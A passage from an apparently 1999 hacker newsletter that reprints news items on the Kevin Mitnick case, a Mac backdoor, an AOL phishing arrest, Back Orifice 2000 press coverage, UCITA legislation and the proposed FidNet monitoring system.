  3524.      prosecutors on the Mitnick case. "The real story here," he
  3525.      growls during a telephone interview from his Van Nuys
  3526.      office, "is how the U.S. attorney gave this case away."
  3527.  
  3528.      To begin with, Diamond believes Mitnick shouldn't even be
  3529.      appearing in front of Pfaelzer, but rather in a federal court in
  3530.      North Carolina because that's where he was arrested back
  3531.      in 1995. Not only was he charged with violating his probation
  3532.      but he was indicted by a Raleigh grand jury on 25 fresh
  3533.      charges of hacking, wire fraud and theft of intellectual
  3534.      property.
  3535.  
  3536.      Mitnick cut a quick plea deal with Raleigh prosecutors so he
  3537.      could be transferred back to L.A. to face yet another set of
  3538.      hacking charges. The Southern California case was also
  3539.      disposed of with a plea deal, which Mitnick entered in
  3540.      March. "It's bizarre," Diamond says of the federal
  3541.      proceedings. "Completely bizarre."
  3542.  
  3543.      L.A. Assistant U.S. Attorney David Schindler, who handled
  3544.      Mitnick's latest federal case, has heard it all before. In fact,
  3545.      he's getting blasted from both sides of the Mitnick issue.
  3546.  
  3547.      Critics such as Diamond say he's gone too soft on Mitnick.
  3548.      Meanwhile, a growing number of young computer nerds
  3549.      protest that Mitnick is a political prisoner who has done little
  3550.      -- if anything -- illegal, and is relentlessly being pursued by
  3551.      different sets of prosecutors. Even if he did all the things that
  3552.      he has done, the theory goes, he's already received the
  3553.      harshest punishment ever for hacking. Pro-Mitnick
  3554.      protesters are pleading their case on numerous Web sites.
  3555.  
  3556.      But Schindler, who has been locking up hackers since 1991,
  3557.      says Mitnick got the same prison sentence he would have
  3558.      received had he gone to trial. "What we gave away [with the
  3559.      plea bargain] was the right to argue for an upward
  3560.      departure" in Mitnick's sentence, says Schindler, referring to
  3561.      a prosecutor's ability to seek a longer prison term than the
  3562.      one called for in federal sentencing guidelines.
  3563.  
  3564.      Schindler concedes that Mitnick's sentence is the longest that
  3565.      he has seen during the years he's been prosecuting hackers.
  3566.      Kevin Poulsen, another infamous hacker that Schindler
  3567.      prosecuted, received a 51-month sentence. He was also
  3568.      ordered to pay about $100,000 in restitution.
  3569.  
  3570.      When all is said and done, Mitnick will have been sentenced
  3571.      to 68 months in federal custody, may yet do state time, and
  3572.      may also be ordered to pay several times the restitution
  3573.      Poulsen did. And as for Diamond's forum-shopping charge,
  3574.      Schindler says, "Mitnick begged us to transfer him to L.A."
  3575.  
  3576.      That J. Tony Serra has taken Kevin Mitnick's case goes to
  3577.      show how ubiquitous this Internet thing has become. The
  3578.      Digital Age has truly affected all segments of society if it has
  3579.      touched an aging radical lawyer like Serra, who has his
  3580.      marijuana prescribed by a doctor and who's known for
  3581.      driving rusting junkers around town, only to abandon them on
  3582.      the street the minute they finally give out on him.
  3583.  
  3584.      His association with Mitnick will certainly make him and his
  3585.      associates extremely simpatico with all of hackerdom. That
  3586.      crowd is facing increased government scrutiny as the
  3587.      Department of Justice continues to dedicate more money
  3588.      each year to fighting cybercrime. "This was our first case
  3589.      relating to computers," says Santa Monica defense attorney
  3590.      Gregory Vinson, who is assisting Randolph with Mitnick's
  3591.      federal case. "It's an area we are going to develop more."
  3592.  
  3593.      U.S. Attorney General Janet Reno has asked Congress to
  3594.      give the Justice Department's computer crimes and
  3595.      intellectual property division an additional $120 million to fight
  3596.      cybercrime next year. Other agencies -- federal and local --
  3597.      are beefing up their cybercrime forces as well.
  3598.  
  3599.      "If someone would have told me two years ago that I would
  3600.      be prosecuting Internet fraud, I seriously would have laughed
  3601.      in their face," Jay Perlman, deputy chief of the Securities and
  3602.      Exchange Commission Office of Internet Enforcement, said
  3603.      recently at a cybercrime symposium in Virginia.
  3604.  
  3605.      In the wake of several Mitnick-inspired hack jobs on
  3606.      government Web sites in the past year, a federal
  3607.      multi-agency task force has been formed in Dallas
  3608.      specifically to fight hackers. The task force has issued 16
  3609.      warrants in 12 jurisdictions, but has yet to charge anyone
  3610.      with a crime. "So far, cybercrime has mostly been a federal
  3611.      effort," says Jennifer Granick, a San Francisco criminal
  3612.      defense attorney who is carving out a nice niche for herself
  3613.      as a computer crime specialist. "But the locals are getting
  3614.      increasingly involved, too."
  3615.  
  3616.      By 2005, it's predicted that one billion people worldwide will
  3617.      be on the Internet, and prosecutors expect the number of
  3618.      cybercrime cases will rise accordingly.
  3619.  
  3620.      A closer look makes it clear that Serra and Mitnick have
  3621.      more in common than not. Both stand out as countercultural
  3622.      icons for their peers. Serra is a hero to every hippie who
  3623.      went to law school, while Mitnick appeals to disaffected
  3624.      youths who are known as hackers, crackers and high-tech
  3625.      poseurs. Both have inspired the creation of Hollywood
  3626.      movies. James Woods played a Serra-like character in
  3627.      1989's True Believer while Mitnick's life goes on the big
  3628.      screen next month in Takedown , which chronicles the
  3629.      manhunt for him.
  3630.  
  3631.      So it's not a stretch to imagine Serra representing more
  3632.      hackers and others accused of computer crimes down the
  3633.      line.
  3634.  
  3635.      But first, he's got to learn how to use a computer -- or at
  3636.      least speak the language. "I don't even know any of the
  3637.      terminology," he says. "I'm organic, man."
  3638.  
  3639.                                                  
  3640.      Tony Serra 
  3641.  
  3642.      He hasn't even spoken with Mitnick yet. Instead, it's been
  3643.      Figueroa and Hagin who have been answering Mitnick's
  3644.      daily telephone calls. Truth is, this is really their case. Sure,
  3645.      Serra will handle the trial and all the big hearings such as a
  3646.      motion to dismiss. And it will be Serra pushing the David
  3647.      versus Goliath angle and garnering all of the press.
  3648.  
  3649.      But it's Figueroa and Hagin who will do the heavy lifting,
  3650.      such as wheedling discovery out of Diamond and handling
  3651.      Mitnick's bail appeal. That's the way it works in Serra's
  3652.      office, and the two young lawyers are appreciative.
  3653.  
  3654.      Both have been attorneys for less than a year and probably
  3655.      would not have landed work on such a high-profile case --
  3656.      albeit for expenses only -- if not for Serra. He says he'll give
  3657.      them a chance to examine witnesses if Mitnick's case gets to
  3658.      trial.
  3659.  
  3660.      Both appear ready. Serra always seems to have smart
  3661.      neophyte lawyers in orbit around his office. Figueroa
  3662.      graduated from Stanford Law School while Hagin is a
  3663.      product of the University of San Francisco School of Law.
  3664.      Both gained invaluable experience as clerks to Serra when
  3665.      they rented a house in Ukiah during the Bear Lincoln trial,
  3666.      during which they wrote many of the case's motions.
  3667.  
  3668.      They also appear smart enough to ignore Serra's complaints
  3669.      of high-technology ignorance. "Tony pretends to be mystified
  3670.      by computers," says Figueroa. "But he's not. He'll be ready
  3671.      for trial."
  3672.  
  3673.  
  3674.      Paul Elias is a reporter at The Recorder ,a San Francisco affiliate of California Law Week . 
  3675.      
  3676.      Wired- Sentencing Delayed       
  3677.       http://www.wired.com/news/news/politics/story/20953.html
  3678.       
  3679.       More Delays for Mitnick
  3680.       by Douglas Thomas 
  3681.       
  3682.       3:00 a.m.  27.Jul.99.PDT
  3683.       The sentencing hearing for convicted cracker Kevin Mitnick was postponed for a fourth time Monday
  3684.       and rescheduled for 9 August. 
  3685.           
  3686.       US District Judge Marianne Pfaelzer issued a continuance because of scheduling conflicts, according
  3687.       to a court clerk. 
  3688.       
  3689.          
  3690.       Mitnick pleaded guilty on 26 March to five counts of a 25-count federal indictment and two related
  3691.       counts from a Northern California indictment. His plea agreement resulted in a 54-month prison sentence, 
  3692.       making Mitnick eligible to be released into a halfway house pending Pfaelzer's approval and
  3693.       permission from the State of California. 
  3694.       
  3695.       A pattern of delays has plagued the case from its onset. What remains to be determined in Mitnick's 
  3696.       sentencing is the judgment for restitution which Pfaelzer has made clear she will issue. The government
  3697.       contends that Mitnick should be forced to repay US$1.5 million dollars in damages to  the victim companies. 
  3698.       
  3699.       In the pre-sentence investigation report, Mitnick's attorneys said their client is unable to pay anywhere 
  3700.       near that amount and should only be required to repay about $5,000. 
  3701.       
  3702.       Mitnick had already spent more than four years behind bars at the Los Angeles Metropolitan Detention Center. 
  3703.       
  3704.       At the original hearing in March, sentencing was delayed until 14 June. That hearing was again continued to 
  3705.       12 July, when attorneys were unable to reach an agreement about the terms of restitution. The judge was 
  3706.       unprepared to rule, due to a last minute filing by the government to which the defense was unprepared to respond. 
  3707.       
  3708.       
  3709.       Mitnick Fans Await Denouement
  3710.       by Douglas Thomas 
  3711.       
  3712.       3:00 p.m.  13.Jul.99.PDT
  3713.       LOS ANGELES -- Kevin Mitnick's allies rallied here Monday, as the cracker's expected prison term is still up in the air. 
  3714.       
  3715.       Mitnick's sentencing hearing was attended by a number of computer hackers, fresh from Las Vegas where they had attended the annual DefCon
  3716.       hacker meeting.      
  3717.       
  3718.       Defense attorney Donald Randolph spoke to a gathering of a dozen or so hackers in the hallway. "It was nice to see some friendly faces," he said,
  3719.       and thanked them for their continued support. 
  3720.       
  3721.       That support was much needed after US District Judge Marianne Pfaelzer had been particularly tough on both attorneys Monday, comparing them to
  3722.       bickering kids. She went so far as to call the government's motion to sanction attorney Randolph for the release of several letters from victim
  3723.       companies "childish." 
  3724.       
  3725.       The current sentencing proceedings mark the climax to what has been a years-long campaign in the hacker community. 
  3726.       
  3727.       Hackers have focused their attention on the case, launching Web sites like kevinmitnick.com, protests reaching as far as Moscow, and Web site
  3728.       defacements to draw attention to what they see as Mitnick's unjust prosecution and a violation of his Constitutional and civil rights. 
  3729.       
  3730.       Kevinmitnick.com tracks media coverage of the case, and offers information, commentary, and online versions of most of the court filings. Other
  3731.       activists have printed "Free Kevin" bumper stickers and T-shirts, and some have proposed relatively mainstream money-making ventures to help
  3732.       contribute to Mitnick's legal defense fund. 
  3733.       
  3734.       While the activists continually grouse over media coverage of the Mitnick case, citing inaccurate or misinformed accounts, they have also learned
  3735.       the importance of working to provide the press with accurate information. 
  3736.       
  3737.       Particularly infuriating to hackers are claims that Mitnick has been accused or convicted of stealing credit card information (he hasn't), that he has
  3738.       appeared on either the America's Most Wanted TV program or on the FBI's "Ten Most Wanted List" (neither is true), or that he has threatened
  3739.       national security by breaking into NORAD (also not true). 
  3740.       
  3741.       The importance of these media reports and mis-characterizations were driven home last week when a municipal court judge in Van Nuys, CA set
  3742.       Mitnick's bail for his upcoming state case at $1 million dollars, based primarily on media coverage of Mitnick's hacking exploits. 
  3743.       
  3744.       Judge Pfaelzer barred Mitnick from the hearing, and wondered "when do newspaper stories count as evidence in a court of law?" 
  3745.       
  3746.       Many hackers have challenged the court's decisions, ranging from the denial of a bail hearing to a four-year pre-trial incarceration. They charge
  3747.       that the court has repeatedly denied requests for access to court information considered vital to Mitnick's defense. 
  3748.       
  3749.       Although the government's goal has been to "send a message" to hackers about the severity of these crimes and to demonstrate their willingness
  3750.       to prosecute them, hackers appear to be receiving a different message. 
  3751.       
  3752.       One hacker said Monday that the court is doing little to deter him, and instead is, in effect, telling him "be more careful, don't get caught." 
  3753.       
  3754.       Another hacker, Kerry Zero, said the government's agenda in this case is to set a foundation which "makes it easier to prosecute hackers in the
  3755.       future." 
  3756.       
  3757.       Not surprisingly, many supporters painted Mitnick as the victim in the case. They said that the financial damages being claimed are overstated, and
  3758.       that no adequate explanation has been offered for why Mitnick was held for so long without a trial or bail.  
  3759.       
  3760.       "All this talk about protecting the victim -- Kevin is the victim in this case," said one hacker, who asked not to be identified. 
  3761.       
  3762.       After the hearing, three hackers, Teklord, Bonq, and Sig9, all expressed deeper concerns about the case.  
  3763.       
  3764.       For Teklord, the result was one of dismay. "I'm confused about the government," he said. "The system is supposed to protect people and it's failing
  3765.       us." 
  3766.       
  3767.       Bonq expressed a similar confusion. "I don't know who to trust." And after watching the hearing, Sig9 said he had "lost a lot of respect for the
  3768.       system." 
  3769.       
  3770.       For many hackers, the Mitnick case has been a civics lesson in how the system works. 
  3771.       
  3772.       Biff Macki, a hacker who has followed the Mitnick case for some time thinks the lesson is pretty clear-cut. "If the government wants you, they'll get
  3773.       you, no matter what," he said. 
  3774.       
  3775.       The problem, he says, is in the system itself. 
  3776.       
  3777.       "[The US government has] millions of dollars to spend and it is impossible to organize an adequate defense on 15 minutes of collect calls a day from
  3778.       federal prison." 
  3779.       
  3780.       @HWA
  3781.       
  3782. 24.0  Back Orifice for Macintosh? 
  3783.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3784.       
  3785.       From HNN http://www.hackernews.com/
  3786.         
  3787.       contributed by Nick 
  3788.       SecureMac.com has a story about TakeDown Suite 2.5,
  3789.       a backdoor program similar to the original Back Orifice.
  3790.       Once installed the application allows someone to
  3791.       remotely administer the machine. This is similar
  3792.       functionality to Back Orifice, which only works under
  3793.       windows. TakeDown Suite operates by installing an
  3794.       invisible extension into the system folder, when the
  3795.       machine next reboots it is vulnerable. Now where is that
  3796.       idiot that said Macs where secure? 
  3797.  
  3798.       Secure Mac
  3799.       http://www.securemac.com/
  3800.       
  3801.       
  3802. 25.0  AOL Criminals Busted 
  3803.       ~~~~~~~~~~~~~~~~~~~~
  3804.       
  3805.       From HNN http://www.hackernews.com/      
  3806.        
  3807.       contributed by Lamer 
  3808.       After sending out bogus emails to AOL customers asking
  3809.       for credit card numbers two teenagers where able to
  3810.       get 900 people to cough them up. With about a 2%
  3811.       return rate on the emails they sent out the pair started
  3812.       to use the credit card numbers. They bought computer
  3813.       equipment that they later sold on eBay and sold the
  3814.       numbers in chat rooms. The Department of Justice and
  3815.       FBI, both worked on the case but would not reveal how
  3816.       the two had been caught. (I am glad the author did not
  3817.       call these two 'hackers') 
  3818.  
  3819.       APB Online
  3820.       http://www.apbonline.com/911/1999/07/23/netcredit0723_01.html
  3821.       
  3822.       AOL USERS DUPED BY TEENS,
  3823.       COPS SAY
  3824.       Hundreds Sent Credit Card Numbers in Response to E-Mails 
  3825.  
  3826.       July 23, 1999 
  3827.  
  3828.       By Valerie Kalfrin 
  3829.  
  3830.       SACRAMENTO, Calif. (APBNews.com) -- Two teenagers who police
  3831.       say illegally accessed America Online and wrote e-mails pretending to
  3832.       represent the company duped about 900 people into giving them their
  3833.       credit card numbers, authorities said today. 
  3834.  
  3835.       Dino Dagdagan, 18, of Carson and a 17-year-old home-schooled
  3836.       Sacramento student are charged with felony possession of access to
  3837.       credit accounts and other crimes. 
  3838.  
  3839.       The two allegedly sent out thousands of e-mails to America Online
  3840.       customers, claiming there was a problem with their accounts and
  3841.       asking the subscribers to visit a Web site to correct matters, officials
  3842.       said. 
  3843.  
  3844.       Fake Web site 
  3845.  
  3846.       But the Web site, too, was a fake, set up
  3847.       to glean the unsuspecting customers'
  3848.       credit card numbers, said Sgt. Rick
  3849.       Gibson, a spokesman for the Sacramento
  3850.       County Sheriff's Department. 
  3851.  
  3852.       "People should call the company and
  3853.       make sure it's a true communication and
  3854.       a real Web site," Gibson told
  3855.       APBNews.com today. "Out of every
  3856.       10,000 e-mails they sent out, about 200 customers would give them
  3857.       information." 
  3858.  
  3859.       The 17-year-old allegedly traded or sold the numbers in Internet chat
  3860.       rooms while Dagdagan allegedly used the credit card accounts to buy
  3861.       computer equipment, which he then sold via the online auction site
  3862.       eBay, Gibson said. 
  3863.  
  3864.       Task force tracks down suspects 
  3865.  
  3866.       Customers alerted police to the scam about a month ago when they
  3867.       noticed purchases on their credit card bills that they had not made,
  3868.       police said. A Northern California multi-agency task force, including
  3869.       computer-crimes experts from the Department of Justice and FBI,
  3870.       helped track down the youths, Gibson noted, although he would not go
  3871.       into specifics. 
  3872.  
  3873.       "We have ways of doing things," he said. 
  3874.  
  3875.       The juvenile, who was released to his parents' custody last week, is
  3876.       accused of obtaining the illegal access to the Sterling, Va.-based
  3877.       Internet service provider, officials said. 
  3878.  
  3879.       Dagdagan, who is free on $10,000 bond, also faces possession of
  3880.       stolen property and an additional computer-crimes charge. He's due to
  3881.       be arraigned July 28 in a Lynwood court. 
  3882.  
  3883.       America Online's corporate headquarters did not return a phone call
  3884.       seeking comment today. 
  3885.       
  3886.       @HWA        
  3887.       
  3888. 26.0 Press Does Not Know What to Say About BO2K 
  3889.      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3890.      
  3891.       From HNN http://www.hackernews.com/
  3892.  
  3893.       contributed by Weld Pond 
  3894.       The number of articles that are showering accolades
  3895.       onto BO2K is amazing. Ok, maybe they aren't all that
  3896.       positive, but at least neutral and not claiming it is a
  3897.       trojan/virus. Some people still aren't getting the full
  3898.       picture but at least this is progress. 
  3899.  
  3900.       InformationWeek
  3901.       http://www.informationweek.com/745/45iujl.htm
  3902.       
  3903.       InternetView:
  3904.       Pariah's Software Has Value 
  3905.  
  3906.       By Jason Levitt 
  3907.  
  3908.         xcept for its peculiar name and seemingly sinister authors, Back
  3909.         Orifice 2000, the recently released remote administration software for
  3910.       the Windows and Windows 2000 platforms, might be considered a
  3911.       contender in any comparative product review. Instead, it's a pariah,
  3912.       demonized because it's been misused by some Internet villains, and
  3913.       ignored because its authors don't appear to have day jobs. Yet this
  3914.       software is deserving of closer attention, if only because it's high-quality
  3915.       programming released as free software under the GNU Public License.
  3916.       Sure, there's reason enough not to trust the software--the employees of
  3917.       the virtual vendor that created it, the Cult of the Dead Cow, won't reveal
  3918.       their real names. Nevertheless, BO2k doesn't look so bad stacked up
  3919.       against mainstream commercial competitors such as Symantec's
  3920.       pcAnywhere, Compaq's Carbon Copy, and Artisoft's CoSession
  3921.       Remote.
  3922.  
  3923.       Am I advocating the use of dangerous software on your LAN? Absolutely
  3924.       not. But I don't think BO2k should be dismissed because the authors
  3925.       have a political agenda. Even Jason Garms, Microsoft's lead product
  3926.       manager for Windows NT security, concedes BO2k does "little different
  3927.       from what legitimate remote-control software can do." So what is
  3928.       Microsoft's objection? According to Garms, it's that BO2k is "designed
  3929.       to be stealthy and evade detection by the user." This is a reasonable
  3930.       objection, and it's the primary reason it's difficult to take the software
  3931.       seriously as an end-user product. Such software is easy to abuse,
  3932.       especially when it's free and comes with complete source code.
  3933.  
  3934.       The Cult's "Minister of Propaganda," who goes by the name "Deth
  3935.       Vegetable," is the first to admit the cult is no fan of Microsoft, and, in
  3936.       fact, one reason for BO2k's existence is to convince Microsoft to "finally
  3937.       implement a security model in their Windows operating system." I would
  3938.       prefer Microsoft engineer a new operating system (see Internet Zone),
  3939.       but revamping the Windows security model to create a secure system
  3940.       would be nearly as much effort. Even open-source pundit Eric Raymond
  3941.       agrees that "BO2k exposes the fact that the so-called `security' of
  3942.       Windows is a bad joke."
  3943.  
  3944.       It's easy to see that free software that can control PCs remotely will be
  3945.       abused. But BO2k will ultimately help more than hinder, by revealing the
  3946.       inadequacies of the Windows security model and providing useful
  3947.       source code for developers. 
  3948.  
  3949.       @HWA 
  3950.  
  3951.  
  3952. 27.0 UCITA Moves Forward - Will Remove Vendor Liability
  3953.      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3954.         
  3955.       From HNN http://www.hackernews.com/
  3956.       
  3957.       contributed by Evil Wench 
  3958.       The National Conference of Commissioners on Uniform
  3959.       State Laws (NCCUSL) is likely to endorse the Uniform
  3960.       Computer Information Transactions Act (UCITA). This
  3961.       isn't a federal law but a law that will be passed around
  3962.       to all the states to enact individually making it even
  3963.       harder to defeat. The proposal will allow software
  3964.       manufacturers to sell software that is broken with no
  3965.       liability, even if they knew it didn't work. It gives
  3966.       vendors the right to disable software remotely without
  3967.       prior authorization from the customer. It would prevent
  3968.       reverse engineering and place a gag order on anyone
  3969.       who said anything bad about a product. 
  3970.  
  3971.       ComputerWorld
  3972.       http://www.computerworld.com/home/print.nsf/all/990726B6A6
  3973.       
  3974.       InfoWorld- UCITA Summary
  3975.       http://www.infoworld.com/cgi-bin/displayStory.pl?/features/990531ucita_home.htm
  3976.       
  3977.       -=-
  3978.       
  3979.       UCITA is going to hurt you if you don't watch out
  3980.  
  3981.       By Dan Gillmor
  3982.       07/26/99 All IT managers have their share of horror stories in
  3983.       dealing with software and the companies that sell it -- buggy
  3984.       products, slow response by vendors and so on. But if some
  3985.       proposed legislation becomes law around the U.S., your
  3986.       worries may just be starting. 
  3987.  
  3988.       By the time you read this, the National Conference of
  3989.       Commissioners on Uniform State Laws (NCCUSL) is likely to
  3990.       have endorsed the Uniform Computer Information
  3991.       Transactions Act (UCITA). This legislation is high on the
  3992.       software industry's wish list, because it would tilt the balance
  3993.       of power to vendors -- and away from users. 
  3994.  
  3995.       Even if the mounting opposition somehow persuades the
  3996.       commissioners to back off, recent history shows that the
  3997.       software industry won't give up. This issue isn't going away,
  3998.       no matter what happens at the commissioners meeting this
  3999.       week in Denver. 
  4000.  
  4001.       A variety of reputable consumer and professional
  4002.       organizations oppose this proposal -- among them, the
  4003.       Federal Trade Commission, the Association for Computing
  4004.       Machinery, the Association for Information Management and
  4005.       Consumers Union. Here are some of their objections: 
  4006.  
  4007.          o Sellers could legally disclaim any obligation to sell
  4008.            products that work. They would be legally immune even
  4009.            if they knew about defects before the sale and
  4010.            deliberately failed to disclose the defects, no matter how
  4011.            serious. 
  4012.  
  4013.          o In the event of a dispute, a vendor could disable a
  4014.            customer's software remotely, even if that totally
  4015.            disrupted the customer's business. The seller would have
  4016.            a unilateral right to decide that the customer was
  4017.            violating the terms of the contract; a buyer would have
  4018.            to take the vendor to court in response. 
  4019.  
  4020.          o Reverse engineering, used by security experts to
  4021.            examine software, could be prohibited, increasing the risk
  4022.            that buggy products and viruses would go undetected. 
  4023.  
  4024.          o A vendor could prohibit a user from publicly commenting
  4025.            on the quality or performance of a product. In other
  4026.            words, if it didn't work, you couldn't tell your colleagues
  4027.            at other companies or vice versa.
  4028.  
  4029.       UCITA is itself a backup plan. The industry's original strategy
  4030.       was to get a rewrite of the Uniform Commercial Code, the
  4031.       system designed to ensure uniform laws dealing with
  4032.       commerce. But when the American Law Institute -- the
  4033.       NCCUSL's co-drafter of Uniform Commercial Code proposals
  4034.       -- listened to the opponents and backed away from the idea,
  4035.       the software companies persuaded the NCCUSL to push
  4036.       ahead with UCITA anyway. (For more history and information,
  4037.       check out a detailed account at www.infoworld.com/ucita at
  4038.       the Web site of Computerworld's sister publication Infoworld.) 
  4039.  
  4040.       If the commissioners endorse UCITA, the proposed law would
  4041.       move into state legislatures around the nation this year.
  4042.       Whatever happens, the industry's relentless pursuit of this
  4043.       legislation should be a wake-up call to other IT people. 
  4044.  
  4045.       Get ready to fight this legislation in your statehouses. Whether
  4046.       it's UCITA or something else, the software barons won't stop
  4047.       pushing against your rights. Stay on your guard, or you'll
  4048.       regret it. 
  4049.       
  4050.       
  4051.       -=-
  4052.       
  4053.           InfoWorld- UCITA Summary
  4054.       http://www.infoworld.com/cgi-bin/displayStory.pl?/features/990531ucita_home.htm
  4055.       
  4056.   
  4057.       
  4058.       May 31, 1999 
  4059.  
  4060.        UCITA: Summary information
  4061.  
  4062.        UCITA and the issues that revolve around it are extremely complex. It raises many thorny problems of which the wisest of the wise would have
  4063.        trouble striking a fair balance, and its potential consequences in the electronic-commerce world of the future is surely any mortal's prediction.
  4064.        Yet the process by which it could become the law of the land is obscure, convoluted, and highly legalistic, making it difficult for everyone who
  4065.        has a stake in what it says to have input into its development. 
  4066.  
  4067.        The purpose of this page is to provide some background and resources for those who want to understand UCITA better and for those who want
  4068.        to find a way to have their voice heard. I obviously have my own point of view on the act and what I think it means for InfoWorld readers -- as
  4069.        I've said, I've gone from being naively optimistic about the chances for the law helping software customers to deeply concerned that it will only
  4070.        make things worse, and you can certainly learn why I feel that way here. But there's more than enough sources of information for you to make
  4071.        up your own mind and to decide what you want to do about it.
  4072.  
  4073.        This site includes:
  4074.  
  4075.             a brief explanation of what UCITA is and how the process works
  4076.             a background piece from Ed Foster on why he thinks UCITA is important to software customers 
  4077.             links to InfoWorld stories and columns on UCITA and Article 2B
  4078.             a list of the top dozen issues opponents of UCITA are concerned about 
  4079.  
  4080.        There are also a number of other Web sites that can provide you with all the details on the numerous issues involved in the 2B draft. The de
  4081.        facto clearinghouse for legal briefs and position papers from all sides in the process is the "Guide to the Proposed Law on Software
  4082.        Transactions" provided by Carol A. Kunze at http://www.2bguide.com/. This guide also provides further background on the UCC, reports that
  4083.        have appeared in the press about 2B and links to the current draft. Two recent papers posted there which do a good job of summarizing the
  4084.        opposing views on UCITA are the NCCUSL leadership's defense of the move from 2B to UCITA at http://www.2bguide.com/docs/nuaa.html
  4085.        and a rebuttal by law professor Jean Braucher at http://www.2bguide.com/docs/0499jb.html. 
  4086.  
  4087.        Many sites about Article 2B have not yet been updated to reflect the change to UCITA. Two Web sites that have a great deal of background
  4088.        information on consumer-related issues in the draft (few of which have changed to any substantial degree) are Ralph Nader's Consumer Project
  4089.        on Technology site at http://www.cptech.org/ucc/ and the site of "Bad Software" author and attorney Cem Kaner at
  4090.        http://www.badsoftware.com.
  4091.  
  4092.  
  4093.        What you can do
  4094.  
  4095.        With the July meeting where UCITA will be up for approval by the NCCUSL commissioners fast approaching, readers must act quickly if they
  4096.        are to influence the outcome. One simple thing you can is to sign our e-mail petition, which reads as follows:
  4097.  
  4098.        "In light of the concerns previously expressed over proposed UCC Article 2B by a variety of interest groups, and the lack of time such groups
  4099.        have had to study and respond to its new reincarnation as a uniform act, the undersigned urge the National Conference of Commissioners on
  4100.        Uniform State Laws to not approve the Uniform Computer Information Transactions Act at this time."
  4101.  
  4102.        If you agree, "sign" the petition by sending an e-mail to us at ucita@infoworld.com with any additional comments you'd like to make and your
  4103.        name, title, company, city, and state. The results will be presented to the NCCUSL commissioners in Denver to help demonstrate to them that
  4104.        the concern about UCITA is widespread. 
  4105.  
  4106.        An even more effective step is to write directly to the NCCUSL commissioners who represent your state. The Society for Information
  4107.        Management has urged its membership to do this, and InfoWorld readers could make a big difference by adding their voices to that of SIM's
  4108.        members. To get the list of commissioners for your state, along with a draft letter you can customize, visit SIM's site at
  4109.        http://www.simnet.org/public/programs/issues/ucccode.html.
  4110.  
  4111.        It's not too early to make sure your state legislators and the governor also are aware of your concerns about UCITA. While we won't know until
  4112.        the end of July whether UCITA will be approved for distribution to the state legislatures, that's where the fight will move next if the
  4113.        commissioners OK it. Even if they reject UCITA, there is a possibility that "rogue" versions of the law will be introduced in some states in any
  4114.        case. So the more aware those in your state's government are of the controversial nature of UCITA, the better.
  4115.  
  4116.  
  4117.       @HWA
  4118.       
  4119. 28.0 NSC Proposes FidNet - Infrastructure Protection or Surveillance Tool? 
  4120.      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
  4121.      
  4122.      From HNN http://www.hackernews.com/
  4123.  
  4124.       contributed by Weld Pond 
  4125.       A draft prepared by the National Security Council last
  4126.       month, calls for a sophisticated software system to
  4127.       monitor activities on nonmilitary Government networks
  4128.       and a separate system to track networks used in crucial
  4129.       industries like banking, telecommunications and
  4130.       transportation. This system is to be called FidNet or the
  4131.       Federal Intrusion Detection Network. The effort is
  4132.       intended to alert law enforcement officials to attacks
  4133.       against the nation's Infrastructure. Opponents are
  4134.       saying that this could become a building block for a
  4135.       surveillance infrastructure with great potential for
  4136.       misuse. 
  4137.  
  4138.       NY Times      
  4139.       http://www.nytimes.com/library/tech/99/07/biztech/articles/28compute.html
  4140.       
  4141.       July 28, 1999
  4142.  
  4143.  
  4144.      U.S. Drafting Plan for Computer
  4145.      Monitoring System
  4146.  
  4147.      By JOHN MARKOFF
  4148.  
  4149.          The Clinton Administration has developed a plan for an extensive
  4150.           computer monitoring system, overseen by the Federal Bureau of
  4151.           Investigation, to protect the nation's crucial data networks from
  4152.      intruders. 
  4153.  
  4154.      The plan, an outgrowth of the Administration's anti-terrorism program, has
  4155.      already raised concerns from civil liberties groups. 
  4156.  
  4157.      A draft prepared by officials at the National Security Council last month,
  4158.      which was provided to The New York Times by a civil liberties group,
  4159.      calls for a sophisticated software system to monitor activities on
  4160.      nonmilitary Government networks and a separate system to track networks
  4161.      used in crucial industries like banking, telecommunications and
  4162.      transportation. 
  4163.  
  4164.      The effort, whose details are still being debated within the Administration,
  4165.      is intended to alert law enforcement officials to attacks that might cripple
  4166.      Government operations or the nation's economy. 
  4167.  
  4168.      But because of the increasing power of the nation's computers and their
  4169.      emerging role as a backbone of the country's commerce, politics and
  4170.      culture, critics of the proposed system say it could become a building block
  4171.      for a surveillance infrastructure with great potential for misuse. 
  4172.  
  4173.      They also argue that such a network of monitoring programs could itself be
  4174.      open to security breaches, giving intruders or unauthorized users a vast
  4175.      window into Government and corporate computer systems. 
  4176.  
  4177.      Government officials said the changing nature of military threats in the
  4178.      information age had altered the nature of national security concerns and
  4179.      created a new sense of urgency to protect the nation's information
  4180.      infrastructure. 
  4181.  
  4182.      "Our concern about an organized cyberattack has escalated dramatically,"
  4183.      Jeffrey Hunker, the National Security Council's director of information
  4184.      protection, who is overseeing the plan, said Tuesday. "We do know of a
  4185.      number of hostile foreign governments that are developing sophisticated
  4186.      and well-organized offensive cyber attack capabilities, and we have good
  4187.      reason to believe that terrorists may be developing similar capabilities." 
  4188.  
  4189.                                 As part of the plan, networks of
  4190.                                 thousands of software monitoring
  4191.                                 programs would constantly track
  4192.                                 computer activities looking for
  4193.                                 indications of computer network
  4194.                                 intrusions and other illegal acts. 
  4195.  
  4196.                                 The plan calls for the creation of a
  4197.                                 Federal Intrusion Detection Network,
  4198.                                 or Fidnet, and specifies that the data it
  4199.                                 collects will be gathered at the
  4200.      National Infrastructure Protection Center, an interagency task force
  4201.      housed at the Federal Bureau of Investigation. 
  4202.  
  4203.      Such a system, to be put fully in place by 2003, is meant to permit
  4204.      Government security experts to track "patterns of patterns" of information
  4205.      and respond in a coordinated manner against intruders and terrorists. 
  4206.  
  4207.      The plan focuses on monitoring data flowing over Government and national
  4208.      computer networks. That means the systems would potentially have
  4209.      access to computer-to-computer communications like electronic mail and
  4210.      other documents, computer programs and remote log-ins. 
  4211.  
  4212.      But an increasing percentage of network traffic, like banking and financial
  4213.      information, is routinely encrypted and would not be visible to the monitor
  4214.      software. Government officials argue that they are not interested in
  4215.      eavesdropping, but rather are looking for patterns of behavior that suggest
  4216.      illegal activity. 
